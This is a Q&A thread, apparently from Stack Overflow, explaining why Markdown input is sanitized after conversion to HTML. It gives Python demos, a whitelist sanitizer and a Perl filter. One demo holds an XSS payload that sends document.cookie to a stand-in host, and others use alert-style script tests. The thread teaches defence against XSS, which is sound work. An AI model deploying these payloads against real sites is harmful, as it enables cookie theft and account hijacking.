Ok, so I have been reading about Markdown here on SO and elsewhere, and the steps between user input and the DB are usually given as:
1. convert Markdown to HTML
2. sanitize the HTML (with a whitelist)
3. insert into the database
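but to me it makes more sense to do the following:
1. sanitize the Markdown (remove all HTML tags, no exceptions)
2. convert Markdown to HTML
3. insert into the database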
Am I missing something? This seems to me to be pretty nearly XSS-proof.
The basic rule is this: filter for XSS after Markdown has processed the input, not before. Filtering first breaks some of Markdown's features and still leaves security holes. Also note that even PHP Markdown's no-markup mode, which strips HTML tags, does not make you safe from XSS.
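Here is a minimal Python sketch of why stripping tags before conversion is not enough. It relies on two helpers, and both are hypothetical:
- `strip_tags` stands in for a "remove all tags" pre-filter.
- `toy_markdown_links` understands only Markdown's inline link syntax `[text](url)`.

A real Markdown library does far more, but it turns that syntax into an `<a href>` in the same way. The payload contains no HTML at all, so the pre-filter has nothing to strip. The converter then produces the dangerous `javascript:` link.

```python
import re


def strip_tags(text: str) -> str:
    # Hypothetical "no markup" pre-filter: delete anything shaped like an HTML tag.
    return re.sub(r"<[^>]*>", "", text)


def toy_markdown_links(text: str) -> str:
    # Hypothetical toy converter: only handles inline links, [text](url).
    return re.sub(r"\[([^\]]*)\]\(([^)\s]*)\)", r'<a href="\2">\1</a>', text)


# Pure Markdown link syntax, no HTML tags anywhere in the input.
user_input = "[click me](javascript:location='//evil.example/?'+document.cookie)"

filtered = strip_tags(user_input)     # filter BEFORE conversion...
html_out = toy_markdown_links(filtered)  # ...then convert

print(filtered == user_input)  # True: the pre-filter found nothing to strip
print(html_out)
# <a href="javascript:location='//evil.example/?'+document.cookie">click me</a>
```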
Script and XSS
Markdown is just a markup language that happens to render HTML output. There's no tooling directly associated with the Markdown spec, and the spec sets no rules about how dangerous HTML code should be handled.
If all that weren't enough, the fact that Markdown is a superset of HTML makes it a security risk: any HTML tags added to Markdown pass straight through to the output, which makes it susceptible to XSS attacks. Unlike ordinary user text, which you would escape before displaying, raw HTML inside Markdown is emitted unescaped, and that strips away much of the usual protection against these attacks.
Please see this link:
http://michelf.com/weblog/2010/markdown-and-xss/
> hello <a name="n"
> href="javascript:alert('xss')">*you*</a>
Becomes
<blockquote>
<p>hello <a name="n"
href="javascript:alert('xss')"><em>you</em></a></p>
</blockquote>
∴ you must sanitize after converting to HTML.
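A minimal Python sketch of why the order matters for the example above. It uses only the standard library's `html.parser.HTMLParser`. The helper `toy_strip_blockquote` is hypothetical and stands in for just one step of a real Markdown converter: removing the `> ` blockquote markers.

In the raw input, the `>` marker at the start of the second line closes the `<a` tag early. A filter that inspects the input before conversion therefore sees only `name="n"` and treats the `href` as plain text. Once Markdown removes the markers, the `javascript:` URL is back inside the tag.

```python
from html.parser import HTMLParser

# The Markdown input from the example above, exactly as a user would submit it.
raw_input = """> hello <a name="n"
> href="javascript:alert('xss')">*you*</a>"""


class AttrCollector(HTMLParser):
    """Records the attributes of every <a> start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.a_attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.a_attrs.append(dict(attrs))


def a_attributes(html: str) -> list:
    parser = AttrCollector()
    parser.feed(html)
    parser.close()
    return parser.a_attrs


def toy_strip_blockquote(markdown: str) -> str:
    # Hypothetical stand-in for one step of Markdown conversion: drop the "> " markers.
    return "\n".join(l[2:] if l.startswith("> ") else l for l in markdown.split("\n"))


print(a_attributes(raw_input))
# [{'name': 'n'}]  (a pre-conversion filter sees nothing dangerous)
print(a_attributes(toy_strip_blockquote(raw_input)))
# [{'name': 'n', 'href': "javascript:alert('xss')"}]
```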
There are two issues with what you've proposed:
There are some good resources on the web about output sanitization:
Well, certainly removing/escaping all tags would make a markup language more secure. However, the whole point of Markdown is that it allows users to include arbitrary HTML tags as well as its own forms of markup(*). When you allow HTML, you have to clean/whitelist the output anyway, so you might as well do it after the Markdown conversion to catch everything.
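As an illustration of whitelisting the output after conversion, here is a minimal, hypothetical sanitizer built only from Python's standard library: `html.parser.HTMLParser`, `html.escape` and `urllib.parse.urlsplit`.

It rebuilds the HTML from scratch with three rules:
- Only whitelisted tags are emitted.
- Only whitelisted attributes are kept.
- Links with schemes such as `javascript:` are dropped.

The tag, attribute and scheme whitelists are assumptions for illustration. A hand-rolled filter like this is a sketch, and a maintained sanitizer library is the safer choice in production.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed whitelist for illustration only; adjust it to what your Markdown renderer emits.
ALLOWED_TAGS = {"p", "em", "strong", "a", "blockquote", "code", "pre", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}  # every whitelisted attribute here is a URL
ALLOWED_SCHEMES = {"http", "https", "mailto", ""}  # "" means a relative URL


class WhitelistSanitizer(HTMLParser):
    """Rebuilds HTML from scratch, emitting only whitelisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # drop the tag; any text inside it is still emitted, escaped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            try:
                scheme = urlsplit(value.strip()).scheme.lower()
            except ValueError:
                continue  # unparseable URL: drop the attribute
            if scheme not in ALLOWED_SCHEMES:
                continue  # e.g. javascript: or data: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def sanitize(html: str) -> str:
    parser = WhitelistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# A simplified version of the HTML from the blockquote example, sanitized after conversion.
print(sanitize('<p>hello <a name="n" href="javascript:alert(\'xss\')"><em>you</em></a></p>'))
# <p>hello <a><em>you</em></a></p>
```

Because the filter sees the final HTML, it catches dangerous markup whether it came from raw HTML in the input or from Markdown's own syntax.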
*: It's a design decision I don't agree with at all, and one that I think has not proven useful at SO, but it is a design decision and not a bug.
Incidentally, step 3 should be ‘output to page’: the conversion and sanitizing normally take place at the output stage, with the database holding the raw submitted text.
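A minimal sketch of that arrangement, using Python's built-in `sqlite3` with an in-memory database. The table and function names are hypothetical.

`render` is a placeholder for "convert Markdown to HTML, then sanitize the HTML". It uses `html.escape` only so the sketch runs without a Markdown library, and it does not actually convert Markdown.

```python
import sqlite3
from html import escape


def render(markdown_text: str) -> str:
    # Hypothetical placeholder for "convert Markdown to HTML, then sanitize the HTML".
    # html.escape stands in here only so the sketch runs without a Markdown library.
    return "<p>" + escape(markdown_text) + "</p>"


db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, body_markdown TEXT NOT NULL)")


def save_post(body: str) -> int:
    # Store exactly what the user typed: no conversion or filtering on the way in.
    cur = db.execute("INSERT INTO posts (body_markdown) VALUES (?)", (body,))
    db.commit()
    return cur.lastrowid


def show_post(post_id: int) -> str:
    # Convert and sanitize at output time, from the raw stored text.
    (body,) = db.execute(
        "SELECT body_markdown FROM posts WHERE id = ?", (post_id,)
    ).fetchone()
    return render(body)


post_id = save_post("hello *you* <script>alert(1)</script>")
print(show_post(post_id))
# <p>hello *you* &lt;script&gt;alert(1)&lt;/script&gt;</p>
```

Keeping the raw text means the user's original input is still available for editing. It also means an improved sanitizer applies to old posts the next time they are displayed.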
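use strict;
use warnings;
use Text::Markdown ();
use HTML::StripScripts::Parser ();

# Convert Markdown to HTML first, then filter the resulting HTML for XSS.
sub markdown_to_safe_html {
    my ($markdown) = @_;

    my $hss = HTML::StripScripts::Parser->new(
        {
            Context        => 'Document',
            AllowSrc       => 0,    # no src attributes that fetch resources automatically
            AllowHref      => 1,    # allow href on links...
            AllowRelURL    => 1,    # ...including relative URLs
            AllowMailto    => 1,    # ...and mailto: links
            EscapeFiltered => 1,    # show rejected tags as escaped text
        },
        strict_comment => 1,
        strict_names   => 1,
    );

    return $hss->filter_html(Text::Markdown::markdown($markdown));
}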